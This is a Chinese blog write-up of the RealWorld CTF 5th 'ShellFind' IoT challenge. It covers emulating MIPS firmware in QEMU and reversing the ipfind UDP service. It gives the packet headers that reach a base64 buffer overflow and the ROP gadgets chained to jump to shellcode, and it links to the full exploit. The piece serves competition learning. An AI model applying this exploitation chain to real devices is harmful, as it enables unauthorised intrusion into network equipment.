前言

RealWorld CTF 5th 里的一道iot-pwn,根据真实设备固件改编而成,觉得题目贴近iot实战且很有意思,故在此记录一下复现过程。

题目分析

题目描述

Hello Hacker.

You don't know me, but I know you.

I want to play a game. Here's what happens if you lose.

The device you are watching is hooked into your Saturday and Sunday.

When the timer in the back goes off,

your curiosity will be permanently ripped open.

Think of it like a reverse bear trap.

Here, I'll show you.

There is only one UDP service to shell the device.

It's in the stomach of your cold firmware.

Look around Hacker. Know that I'm not lying.

Better hurry up.

Shell or out, make your choice.

从中可以看出漏洞大概率存在于UDP服务中。

固件分析

拿到手的是一个bin包,解压出来可以得到一个完整的文件系统。相比于常规pwn题单一的二进制而言,我们首先要做的是寻找漏洞文件。既然是真实设备改编那我们就可以先在网上找一找官方固件并尝试下载最新版本。

下载到官方的固件后,可以采取bindiff等方法去找被修改过的二进制文件。可以初步判定漏洞应该是出在ipfind程序中。

并且发现此固件为mips大端,且可疑漏洞文件没开保护。

固件模拟

我是直接用qemu去模拟的这个固件,当然也可以尝试用FirmAEfirmadynefirmware-analysis-plus等工具去进行模拟。我的qemu启动脚本如下:

sudo ifconfig ens33 down

sudo brctl addbr br0

sudo brctl addif br0 ens33

sudo ifconfig br0 0.0.0.0 promisc up

sudo ifconfig ens33 0.0.0.0 promisc up

sudo dhclient br0

sudo tunctl -t tap0

sudo brctl addif br0 tap0

sudo ifconfig tap0 0.0.0.0 promisc up

sudo ifconfig tap0 192.168.2.100/24 up

sudo qemu-system-mips \

    -M malta -kernel vmlinux-3.2.0-4-4kc-malta \

    -hda debian_wheezy_mips_standard.qcow2 \

    -append "root=/dev/sda1 console=tty0" \

    -net nic,macaddr=00:16:3e:00:00:01 \

    -net tap,ifname=tap0,script=no,downscript=no \

    -nographic

启动完成之后用scp把固件包、gdbserver、完整的busybox等传上去。之后用如下命令切换到固件包根目录进行操作:

mount -t proc /proc ./squashfs-root/proc

mount -o bind /dev ./squashfs-root/dev

chroot ./squashfs-root/ sh

之后通过/etc/rc.d/rcS初始化服务。

启动完成之后通过./busybox-mips netstat -pantu去查看开放的端口及对应的二进制文件。

可以看到我们之前分析的可疑文件ipfind正是UDP服务。

值得注意的是我们用ps去查看进程发现执行的是/usr/sbin/ipfind br0这个命令,但我qemu的有效网卡是eth0,这样以后我们会发现无法使用gdbserver进行调试,故我们要杀死该进程,并执行/usr/sbin/ipfind eth0 &,这样我们就可以使用gdbserver进行愉快的调试了。

漏洞文件分析

首先是建立socket通信并绑定到62720端口,与刚才看到的端口一致。

接着从client端接收数据,并进行一系列的操作。之后会对数据进行一个判断,以此来确定是否进入sub_40172C函数sub_4013F4函数

sub_40172C函数

想进入这个函数我们可以逆出来他所需接受的内容开头应该为:

header1 = b"FIVI"

header1+= b"\x00\x00\x00\x00"

header1+= b"\x0A\x01\x00\x00"

header1+= b"\x00\x00\x00\x00"

header1+= b"\x00"

header1+= b"\xFF\xFF\xFF\xFF\xFF\xFF"

header1+= b"\x00\x00"

header1+= b"\x00\x00\x00\x00"

这个函数会调用sub_400E50得到net_get_hwaddr(ifname, a1 + 17),实际上就是mac addrqemu启动时可以进行设置,之后打印出来对比一下即可),并把它发送到client端。这个值对于我们进入第二个函数必不可少。

sub_4013F4函数

想进入这个函数我们可以逆出来它所需接受的内容开头应该为:

header2 = b"FIVI"

header2+= b"\x00\x00\x00\x00"

header2+= b"\x0A\x02\x00\x00"

header2+= b"\x00\x00\x00\x00"

header2+= b"\x00"

header2+= mac

header2+= b"\x00\x00"

header2+= b"\x8E\x00\x00\x00"

进入这个函数后,我们即可找到我们的漏洞函数sub_400F50,这个函数有两次base64 decode,第二次解码时会发生缓冲区溢出。

漏洞利用

因为没开保护,我们布置好rop跳到shellcode上即可。但是我们由于没有libc地址,我们需要花费一定时间在ipfind这个文件里去找gadgets进行利用。

我们想要跳转到shellcode上执行,那么我们就需要可以泄露栈地址的gadget,于是我们找到了如下的gadget来泄露栈地址:

.text:004013D0 sub_4013D0:                              # CODE XREF: sub_4013F4+9C↓p

.text:004013D0                                          # sub_4013F4+160↓p ...

.text:004013D0

.text:004013D0 var_8           = -8

.text:004013D0 arg_4           =  4

.text:004013D0 arg_8           =  8

.text:004013D0 arg_C           =  0xC

.text:004013D0

.text:004013D0                 addiu   $sp, -0x10

.text:004013D4                 sw      $a1, 0x10+arg_4($sp)

.text:004013D8                 sw      $a2, 0x10+arg_8($sp)

.text:004013DC                 sw      $a3, 0x10+arg_C($sp)

.text:004013E0                 addiu   $v0, $sp, 0x10+arg_4

.text:004013E4                 sw      $v0, 0x10+var_8($sp)

.text:004013E8                 addiu   $sp, 0x10

.text:004013EC                 jr      $ra

.text:004013F0                 nop

这个gadget可以控制v0为栈地址,我们向上交叉引用找到一个既能控制ra又不改变v0gadget下:

.text:00401F98                 jal     sub_4013D0

.text:00401F9C                 li      $a0, aCanTGetHelloSo  # "Can't get hello socket\n"

.text:00401FA0                 b       loc_4020B4

.text:00401FA4                 nop

.text:004020B4 loc_4020B4:                              # CODE XREF: sub_401DF4+1AC↑j

.text:004020B4                                          # sub_401DF4+238↑j ...

.text:004020B4                 lw      $ra, 0x7C+var_s8($sp)

.text:004020B8                 lw      $s1, 0x7C+var_s4($sp)

.text:004020BC                 lw      $s0, 0x7C+var_s0($sp)

.text:004020C0                 jr      $ra

.text:004020C4                 addiu   $sp, 0x88

但是在走这条gadget之前我们得先恢复gp寄存器,并且还要考虑到a1,a2,a3寄存器对栈的影响,最好可以控制为nop指令,以免对刚才泄露出来的栈地址上指令造成影响。

.text:00401218                 lw      $gp, 0x9C+var_8C($sp)

.text:0040121C                 la      $t9, close

.text:00401220                 jalr    $t9 ; close

.text:00401224                 move    $a0, $s0         # fd

.text:00401228                 move    $v0, $zero

.text:0040122C

.text:0040122C loc_40122C:                              # CODE XREF: sub_401120+80↑j

.text:0040122C                                          # sub_401120+A0↑j

.text:0040122C                 lw      $ra, 0x9C+var_s8($sp)

.text:00401230                 lw      $s1, 0x9C+var_s4($sp)

.text:00401234                 lw      $s0, 0x9C+var_s0($sp)

.text:00401238                 jr      $ra

.text:0040123C                 addiu   $sp, 0xA8

接着可以找到如下gadget使得可以跳转到S0寄存器存指向的地址中:

.text:004027C0 loc_4027C0:                              # CODE XREF: sub_402790+3C↓j

.text:004027C0                 jalr    $t9

.text:004027C4                 nop

.text:004027C8

.text:004027C8 loc_4027C8:                              # CODE XREF: sub_402790+28↑j

.text:004027C8                 lw      $t9, 0($s0)

.text:004027CC                 bne     $t9, $s1, loc_4027C0

.text:004027D0                 addiu   $s0, -4

.text:004027D4                 lw      $ra, 0x1C+var_s8($sp)

.text:004027D8                 lw      $s1, 0x1C+var_s4($sp)

.text:004027DC                 lw      $s0, 0x1C+var_s0($sp)

.text:004027E0                 jr      $ra

.text:004027E4                 addiu   $sp, 0x28

最后找一个可以把v0赋给任意地址,并且可以控制s0gadget即可:

.text:00400F28                 sw      $v0, 0xD($s0)

.text:00400F2C

.text:00400F2C loc_400F2C:                              # CODE XREF: sub_400E50+CC↑j

.text:00400F2C                 la      $v0, ifname

.text:00400F30                 lw      $a0, (ifname - 0x413138)($v0)

.text:00400F34                 la      $t9, net_get_hwaddr

.text:00400F38                 jalr    $t9 ; net_get_hwaddr

.text:00400F3C                 addiu   $a1, $s0, 0x11

.text:00400F40                 lw      $ra, 0x20+var_s4($sp)

.text:00400F44                 lw      $s0, 0x20+var_s0($sp)

.text:00400F48                 jr      $ra

.text:00400F4C                 addiu   $sp, 0x28

exploit效果

完整exploit见:https://github.com/fxc233/CTF/blob/main/IOT/RealWorldCTF-5th-ShellFind/exp.py

参考文章

https://mp.weixin.qq.com/s/Wb7SMy8AHtiv71kroHEHsQ

文章首发:ChaMd5 微信公众号

RealWorld CTF 5th ShellFind 分析的更多相关文章

  1. CTF MISC-USB流量分析出题记录

    USB流量分析 USB接口是目前最为通用的外设接口之一,通过监听该接口的流量,可以得到很多有意思的东西,例如键盘击键,鼠标移动与点击,存储设备的明文传输通信.USB无线网卡网络传输内容等. 1.USB ...

  2. House_Of_Spirit ctf oreo程序分析

    oreo程序下载 提取码:t4xx 程序分析 int __cdecl main() { leave_add = 0; leave_del = 0; leave_buf = (char *)&u ...

  3. ctf pwn ida 分析技巧

    几年前的笔记,搬运过来 ---   1 先根据运行程序得到的信息命名外围函数,主要函数大写开头 2 /添加注释 3 直接vim程序,修改alarm为isnan可以patch掉alarm函数 4 y 可 ...

  4. 实战经验|大神战队都在i春秋教你打CTF

    全国大学生信息安全竞赛创新实践能力赛旨在培养.选拔.推荐优秀信息安全专业人才创造条件,促进高等学校信息安全专业课程体系.教学内容和方法的改革,培养学生的创新意识与团队合作精神,普及信息安全知识,增强学 ...

  5. 学习CTF的经历-文件分析

    文件分析-ZIP伪加密 最近在准备铁人三项赛的比赛,所以在实验吧上尝试着学习CTF,目前菜鸡一枚 我主要负责的是Web和安全杂项这一块,安全杂项的知识点较为薄弱,在实验吧练习的过程中遇到一个很有趣的题 ...

  6. [CTF隐写]png中CRC检验错误的分析

    [CTF隐写]png中CRC检验错误的分析 最近接连碰到了3道关于png中CRC检验错误的隐写题,查阅了相关资料后学到了不少姿势,在这里做一个总结 题目来源: bugku-MISC-隐写2 bugku ...

  7. CTF流量分析题大全(掘安攻防平台)

    突然想做一下流量分析题,记得掘安攻防实验室上面有很多的流量分析题目,故做之 流量分析题一般使用的都是wireshark,(流量分析工具中的王牌 夺取阿富汗 说了分析http头,所以直接过滤http协议 ...

  8. Bugku CTF练习题---分析---flag被盗

    Bugku CTF练习题---分析---flag被盗 flag:flag{This_is_a_f10g} 解题步骤: 1.观察题目,下载附件 2.下载的文件是一个数据包,果断使用wireshark打开 ...

  9. ctf中常见注入题源码及脚本分析

    1.代码审计发现 这里没有用escape_string,因此存在注入. function show($username){ global $conn; $sql = "select role ...

  10. 利用Audacity软件分析ctf音频隐写

    分析音频得到摩斯电码 看波的宽度分辨长短音 比较细的就是短音,代表"." 比较粗的就是长音,代表"-" 中间的间隔就是" " 得到摩斯电码

随机推荐

  1. SpringBoot自定义注解+异步+观察者模式实现业务日志保存

    一.前言 我们在企业级的开发中,必不可少的是对日志的记录,实现有很多种方式,常见的就是基于AOP+注解进行保存,但是考虑到程序的流畅和效率,我们可以使用异步进行保存,小编最近在spring和sprin ...

  2. C#--@符号的使用(逐字字符串,跨行,声明关键字变量名)

    ---对字符串的使用 @可以定义逐字字符串 注意:@只对字符串常量有用 1)不需要用\\来转义非转义符号的\号   例如:@"\"="\\"2)可以实现多行字符 ...

  3. css文字单行/多行超出显示省略号...

    css文字单行/多行超出显示省略号... 项目里写css样式我们经常会遇到将文字超出显示省略号的情况,记录一下以后能用到. 单行超出 .oneline { width:300upx; /*宽度一定要设 ...

  4. 【神经网络】softmax回归

    前言 softmax回归为一种分类模型. 基本原理 由于softmax回归也是一种线性叠加算法,且需要输出离散值. 很自然地想到,可以取值最大的输出为置信输出.更进一步想到,如果有三个人A.B.C分别 ...

  5. [AGC057D] Sum Avoidance

    Link 本篇题解大部分内容来自这篇文章 首先题意翻译: 给定一个正整数 \(S\) ,称一个正整数集合 \(A\) 是好的,当且仅当它满足以下条件: \(A\) 中元素在 \((0,S)\) 之间 ...

  6. freeswitch的mod_curl模块

    概述 有时候,我们需要在呼叫的过程中,或过程后调用web api接口. freeswitch的mod_curl模块可以很方便的实现web api的接口调用. mod_curl模块默认不安装,需要进入模 ...

  7. fuzor2020安装教程

    fuzor下载安装包fuzor2020安装教程Fuzor2020 WIN10 64位安装步骤:1.先使用"百度网盘客户端"下载Fur20_CN_x64安装包到电脑磁盘里,并鼠标右击 ...

  8. VM安装Centos7操作系统

    个人名片: 对人间的热爱与歌颂,可抵岁月冗长 Github‍:念舒_C.ying CSDN主页️:念舒_C.ying 个人博客 :念舒_C.ying 视频教程:https://live.csdn.ne ...

  9. Java反射与安全问题

    1.Java反射机制 Java反射机制是指在运行状态中,对于任意一个类,都能够知道这个类的所有属性和方法:对于任意一个对象,都能够调用它的任意一个方法和属性:这种动态获取的信息以及动态调用对象的方法的 ...

  10. 开发一个最简单的iOS App

    开发一个最简单的iOS App 大家好,我是孜孜不倦学习的Zhangbeihai. 上月底我组织了[组队学习]TensorFlow 入门课程(中文) ,截至目前有300多同学加入.主要就是 Tenso ...